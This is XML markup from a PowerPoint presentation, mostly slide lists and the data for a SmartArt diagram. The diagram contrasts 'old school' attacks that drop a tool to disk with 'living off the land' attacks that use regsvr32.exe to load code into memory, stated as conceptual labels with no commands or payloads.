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4"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId75"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="265" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="305" r:id="rId8"/>
    <p:sldId id="306" r:id="rId9"/>
    <p:sldId id="310" r:id="rId10"/>
    <p:sldId id="331" r:id="rId11"/>
    <p:sldId id="308" r:id="rId12"/>
    <p:sldId id="332" r:id="rId13"/>
    <p:sldId id="311" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="314" r:id="rId16"/>
    <p:sldId id="312" r:id="rId17"/>
    <p:sldId id="271" r:id="rId18"/>
    <p:sldId id="316" r:id="rId19"/>
    <p:sldId id="342" r:id="rId20"/>
    <p:sldId id="318" r:id="rId21"/>
    <p:sldId id="275" r:id="rId22"/>
    <p:sldId id="276" r:id="rId23"/>
    <p:sldId id="319" r:id="rId24"/>
    <p:sldId id="277" r:id="rId25"/>
    <p:sldId id="278" r:id="rId26"/>
    <p:sldId id="317" r:id="rId27"/>
    <p:sldId id="279" r:id="rId28"/>
    <p:sldId id="284" r:id="rId29"/>
    <p:sldId id="285" r:id="rId30"/>
    <p:sldId id="283" r:id="rId31"/>
    <p:sldId id="286" r:id="rId32"/>
    <p:sldId id="287" r:id="rId33"/>
    <p:sldId id="282" r:id="rId34"/>
    <p:sldId id="288" r:id="rId35"/>
    <p:sldId id="289" r:id="rId36"/>
    <p:sldId id="293" r:id="rId37"/>
    <p:sldId id="296" r:id="rId38"/>
    <p:sldId id="297" r:id="rId39"/>
    <p:sldId id="290" r:id="rId40"/>
    <p:sldId id="294" r:id="rId41"/>
    <p:sldId id="298" r:id="rId42"/>
    <p:sldId id="299" r:id="rId43"/>
    <p:sldId id="292" r:id="rId44"/>
    <p:sldId id="300" r:id="rId45"/>
    <p:sldId id="338" r:id="rId46"/>
    <p:sldId id="340" r:id="rId47"/>
    <p:sldId id="339" r:id="rId48"/>
    <p:sldId id="304" r:id="rId49"/>
    <p:sldId id="341" r:id="rId50"/>
    <p:sldId id="291" r:id="rId51"/>
    <p:sldId id="302" r:id="rId52"/>
    <p:sldId id="321" r:id="rId53"/>
    <p:sldId id="303" r:id="rId54"/>
    <p:sldId id="335" r:id="rId55"/>
    <p:sldId id="343" r:id="rId56"/>
    <p:sldId id="344" r:id="rId57"/>
    <p:sldId id="281" r:id="rId58"/>
    <p:sldId id="322" r:id="rId59"/>
    <p:sldId id="323" r:id="rId60"/>
    <p:sldId id="324" r:id="rId61"/>
    <p:sldId id="325" r:id="rId62"/>
    <p:sldId id="320" r:id="rId63"/>
    <p:sldId id="327" r:id="rId64"/>
    <p:sldId id="330" r:id="rId65"/>
    <p:sldId id="328" r:id="rId66"/>
    <p:sldId id="329" r:id="rId67"/>
    <p:sldId id="333" r:id="rId68"/>
    <p:sldId id="334" r:id="rId69"/>
    <p:sldId id="336" r:id="rId70"/>
    <p:sldId id="337" r:id="rId71"/>
    <p:sldId id="326" r:id="rId72"/>
    <p:sldId id="264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9089"/>
    <a:srgbClr val="4C6169"/>
    <a:srgbClr val="123E64"/>
    <a:srgbClr val="FF8641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86335" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="121" d="100"/>
          <a:sy n="121" d="100"/>
        </p:scale>
        <p:origin x="268" y="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F04816-3BB6-4371-A8CA-5340FC8D28E3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0AFD8B07-9F41-49DE-A678-89D5CBEAE7EC}">
      <dgm:prSet phldrT="[Tekst]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="149089"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Old </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>school</a:t>
          </a:r>
          <a:endParaRPr lang="nb-NO" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{61A5456D-715D-499E-87B1-4D3A8A988255}" type="parTrans" cxnId="{4C1A495B-3086-4A4F-BB69-51B97B6AD785}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nb-NO"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11706E6D-A86A-47F7-BC59-624D0DBDBD81}" type="sibTrans" cxnId="{4C1A495B-3086-4A4F-BB69-51B97B6AD785}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nb-NO"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{931134C8-CC78-4181-AB82-9DD3449B9CBB}">
      <dgm:prSet phldrT="[Tekst]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="149089"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1"/>
            <a:t>Binary</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1"/>
            <a:t>dropped</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0"/>
            <a:t> to disk – C:\temp\hackertool.exe</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FF0E5FD-1594-42F9-8B5E-E4F8EAFCD385}" type="parTrans" cxnId="{E1AE3A35-C78E-4A95-B6F8-B5C43B782FA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nb-NO"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E70C1CED-3A3F-4D7D-9979-9B566189D430}" type="sibTrans" cxnId="{E1AE3A35-C78E-4A95-B6F8-B5C43B782FA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nb-NO"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{93A314A8-857E-4077-8D62-927A2CEED7AE}">
      <dgm:prSet phldrT="[Tekst]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="149089"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1"/>
            <a:t>Executes</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0"/>
            <a:t> hackertool.exe from disk</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9CFB164D-7DCB-47A3-BEDC-F36D0DEEAE07}" type="parTrans" cxnId="{1924CAB7-2071-4C86-BBFA-AE9F89113899}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nb-NO"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D433390-AAA9-4447-B889-6998CA63ED80}" type="sibTrans" cxnId="{1924CAB7-2071-4C86-BBFA-AE9F89113899}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nb-NO"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DBE952AD-77A6-4896-A077-7E711CF1C60D}">
      <dgm:prSet phldrT="[Tekst]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="0070C0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Living</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>off</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>the</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> land</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F546E546-02E7-4053-86D8-D5045C4CC64B}" type="parTrans" cxnId="{5E9BD48A-42DA-4E03-A66C-32A028FBADB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nb-NO"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E896ABC0-2914-41A7-96C0-A5B81220AA5C}" type="sibTrans" cxnId="{5E9BD48A-42DA-4E03-A66C-32A028FBADB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nb-NO"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C700D14A-5B8D-462D-ABBB-64AC735A8874}">
      <dgm:prSet phldrT="[Tekst]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="0070C0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1"/>
            <a:t>Executes</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0"/>
            <a:t> regsvr32.exe to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1"/>
            <a:t>fetch</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1"/>
            <a:t>code</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0"/>
            <a:t> from url</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E370A2F-291F-4BFB-BF92-2145220B6077}" type="parTrans" cxnId="{ED4E2FAF-F5E5-45C8-ADA2-95F3D760CB64}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nb-NO"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1B22CC7-4A55-49C2-8145-596CA48D295A}" type="sibTrans" cxnId="{ED4E2FAF-F5E5-45C8-ADA2-95F3D760CB64}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nb-NO"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{622AEB94-1F35-4733-8664-2BDBE4C77F5C}">
      <dgm:prSet phldrT="[Tekst]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="0070C0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0"/>
            <a:t>Runs </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1"/>
            <a:t>directly</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1"/>
            <a:t>into</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1"/>
            <a:t>memory</a:t>
          </a:r>
          <a:endParaRPr lang="nb-NO" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF733F73-6445-45DC-AD60-B23998F6EDD3}" type="parTrans" cxnId="{84EB703B-1F13-45EC-A60E-B710A4F67A11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nb-NO"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{522D2F7D-E43E-4E76-9585-8A70F50E62C4}" type="sibTrans" cxnId="{84EB703B-1F13-45EC-A60E-B710A4F67A11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nb-NO"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58EEA605-360F-4F34-98FF-CA671E937C43}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="149089"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0"/>
            <a:t>Files </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1"/>
            <a:t>extracted</a:t>
          </a:r>
          <a:endParaRPr lang="nb-NO" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{615B5226-22B2-487C-B460-B1D6B452D745}" type="parTrans" cxnId="{2C155853-692E-4468-8CE6-62333C699681}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nb-NO"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4ADE4EBD-8645-4826-9A57-1309A1373CED}" type="sibTrans" cxnId="{2C155853-692E-4468-8CE6-62333C699681}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nb-NO"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02BF6EFA-AFFB-4EB7-9B56-623F83771019}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="149089"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1"/>
            <a:t>Modules</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0"/>
            <a:t> and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1"/>
            <a:t>the</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0"/>
            <a:t> hacker </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1"/>
            <a:t>tool</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1"/>
            <a:t>loaded</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1"/>
            <a:t>into</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" dirty="0" err="1"/>
            <a:t>memory</a:t>
          </a:r>
          <a:endParaRPr lang="nb-NO" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{697E5897-EDB3-4C8F-960B-269570A67DE9}" type="parTrans" cxnId="{C87A08A1-7EDC-4397-A77C-A7A9D5562A05}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nb-NO"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF7EA33F-A877-4F9E-B1A9-72E32AA44C57}" type="sibTrans" cxnId="{C87A08A1-7EDC-4397-A77C-A7A9D5562A05}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nb-NO"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9296C62F-A86D-4221-8782-B853CC6CD572}" type="pres">
      <dgm:prSet presAssocID="{65F04816-3BB6-4371-A8CA-5340FC8D28E3}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{664A5926-08A4-4692-B486-735C27BEE49A}" type="pres">
      <dgm:prSet presAssocID="{0AFD8B07-9F41-49DE-A678-89D5CBEAE7EC}" presName="vertFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4BE53F5B-8FDB-416A-8C2C-E9CAA9C22704}" type="pres">
      <dgm:prSet presAssocID="{0AFD8B07-9F41-49DE-A678-89D5CBEAE7EC}" presName="header" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2386A7AD-B192-4A25-A6B9-4CB22AAF1053}" type="pres">
      <dgm:prSet presAssocID="{3FF0E5FD-1594-42F9-8B5E-E4F8EAFCD385}" presName="parTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7F945931-5F4B-4C31-8AB4-58DFE571DEFE}" type="pres">
      <dgm:prSet presAssocID="{931134C8-CC78-4181-AB82-9DD3449B9CBB}" presName="child" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7DDB990C-661E-4921-8824-842E99B6E86B}" type="pres">
      <dgm:prSet presAssocID="{E70C1CED-3A3F-4D7D-9979-9B566189D430}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{24390179-6EC5-4AEE-B116-DE6B8C88FE42}" type="pres">
      <dgm:prSet presAssocID="{93A314A8-857E-4077-8D62-927A2CEED7AE}" presName="child" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{55DD7E43-7375-4107-A60D-830145718591}" type="pres">
      <dgm:prSet presAssocID="{5D433390-AAA9-4447-B889-6998CA63ED80}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{08B7B3AF-8974-41AA-B7A3-C35ABB11AE20}" type="pres">
      <dgm:prSet presAssocID="{58EEA605-360F-4F34-98FF-CA671E937C43}" presName="child" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B7986645-D74F-4DAE-B0BB-D1C4DC370663}" type="pres">
      <dgm:prSet presAssocID="{4ADE4EBD-8645-4826-9A57-1309A1373CED}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8A74E8BF-1159-455D-BF56-9ADBAB4E641C}" type="pres">
      <dgm:prSet presAssocID="{02BF6EFA-AFFB-4EB7-9B56-623F83771019}" presName="child" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{70AD9999-1AF2-495B-B492-24A0B497FC32}" type="pres">
      <dgm:prSet presAssocID="{0AFD8B07-9F41-49DE-A678-89D5CBEAE7EC}" presName="hSp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7C555102-959D-417D-AF2B-2C964F0E8A7F}" type="pres">
      <dgm:prSet presAssocID="{DBE952AD-77A6-4896-A077-7E711CF1C60D}" presName="vertFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B53BEE86-B0F2-49FF-AA8A-64361696F70C}" type="pres">
      <dgm:prSet presAssocID="{DBE952AD-77A6-4896-A077-7E711CF1C60D}" presName="header" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5D90CFEF-CFC6-4974-A724-9A8BD9BD094F}" type="pres">
      <dgm:prSet presAssocID="{3E370A2F-291F-4BFB-BF92-2145220B6077}" presName="parTrans" presStyleLbl="sibTrans2D1" presStyleIdx="4" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{27916E72-7250-49AF-BC3C-7C6CF37352D5}" type="pres">
      <dgm:prSet presAssocID="{C700D14A-5B8D-462D-ABBB-64AC735A8874}" presName="child" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9B70452D-6DA3-4ACE-BD84-45159DA0156D}" type="pres">
      <dgm:prSet presAssocID="{A1B22CC7-4A55-49C2-8145-596CA48D295A}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="5" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{82E375E5-B514-430A-83D8-4ADA29FC27E3}" type="pres">
      <dgm:prSet presAssocID="{622AEB94-1F35-4733-8664-2BDBE4C77F5C}" presName="child" presStyleLbl="alignAccFollowNode1" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C3AEEF03-080E-4D31-A3B6-9C6C8A9527B7}" type="presOf" srcId="{58EEA605-360F-4F34-98FF-CA671E937C43}" destId="{08B7B3AF-8974-41AA-B7A3-C35ABB11AE20}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{7A1F3F10-253C-42EE-8897-433074C08670}" type="presOf" srcId="{3FF0E5FD-1594-42F9-8B5E-E4F8EAFCD385}" destId="{2386A7AD-B192-4A25-A6B9-4CB22AAF1053}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{9EE0D711-0885-4AA3-992F-AF39C9738599}" type="presOf" srcId="{C700D14A-5B8D-462D-ABBB-64AC735A8874}" destId="{27916E72-7250-49AF-BC3C-7C6CF37352D5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{96265F1D-E3EB-47EA-ADCA-C42B3A52C5E5}" type="presOf" srcId="{5D433390-AAA9-4447-B889-6998CA63ED80}" destId="{55DD7E43-7375-4107-A60D-830145718591}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{2CBE5D31-6039-4708-BD08-65FAA0E4F5C3}" type="presOf" srcId="{0AFD8B07-9F41-49DE-A678-89D5CBEAE7EC}" destId="{4BE53F5B-8FDB-416A-8C2C-E9CAA9C22704}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{E1AE3A35-C78E-4A95-B6F8-B5C43B782FA7}" srcId="{0AFD8B07-9F41-49DE-A678-89D5CBEAE7EC}" destId="{931134C8-CC78-4181-AB82-9DD3449B9CBB}" srcOrd="0" destOrd="0" parTransId="{3FF0E5FD-1594-42F9-8B5E-E4F8EAFCD385}" sibTransId="{E70C1CED-3A3F-4D7D-9979-9B566189D430}"/>
    <dgm:cxn modelId="{1A40FB36-96A6-4A9E-AB3F-70EED1C115D4}" type="presOf" srcId="{3E370A2F-291F-4BFB-BF92-2145220B6077}" destId="{5D90CFEF-CFC6-4974-A724-9A8BD9BD094F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{84EB703B-1F13-45EC-A60E-B710A4F67A11}" srcId="{DBE952AD-77A6-4896-A077-7E711CF1C60D}" destId="{622AEB94-1F35-4733-8664-2BDBE4C77F5C}" srcOrd="1" destOrd="0" parTransId="{AF733F73-6445-45DC-AD60-B23998F6EDD3}" sibTransId="{522D2F7D-E43E-4E76-9585-8A70F50E62C4}"/>
    <dgm:cxn modelId="{CA9EED3F-A488-4CF2-83CD-052AFE383493}" type="presOf" srcId="{02BF6EFA-AFFB-4EB7-9B56-623F83771019}" destId="{8A74E8BF-1159-455D-BF56-9ADBAB4E641C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{4C1A495B-3086-4A4F-BB69-51B97B6AD785}" srcId="{65F04816-3BB6-4371-A8CA-5340FC8D28E3}" destId="{0AFD8B07-9F41-49DE-A678-89D5CBEAE7EC}" srcOrd="0" destOrd="0" parTransId="{61A5456D-715D-499E-87B1-4D3A8A988255}" sibTransId="{11706E6D-A86A-47F7-BC59-624D0DBDBD81}"/>
    <dgm:cxn modelId="{BEA72D65-CD9E-461D-B57A-684C70191B7D}" type="presOf" srcId="{E70C1CED-3A3F-4D7D-9979-9B566189D430}" destId="{7DDB990C-661E-4921-8824-842E99B6E86B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{ABD3B56D-51F5-4362-ACC2-9514EE5AD3D4}" type="presOf" srcId="{DBE952AD-77A6-4896-A077-7E711CF1C60D}" destId="{B53BEE86-B0F2-49FF-AA8A-64361696F70C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{2C155853-692E-4468-8CE6-62333C699681}" srcId="{0AFD8B07-9F41-49DE-A678-89D5CBEAE7EC}" destId="{58EEA605-360F-4F34-98FF-CA671E937C43}" srcOrd="2" destOrd="0" parTransId="{615B5226-22B2-487C-B460-B1D6B452D745}" sibTransId="{4ADE4EBD-8645-4826-9A57-1309A1373CED}"/>
    <dgm:cxn modelId="{AED0D576-C096-4828-AA45-13398A231049}" type="presOf" srcId="{65F04816-3BB6-4371-A8CA-5340FC8D28E3}" destId="{9296C62F-A86D-4221-8782-B853CC6CD572}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
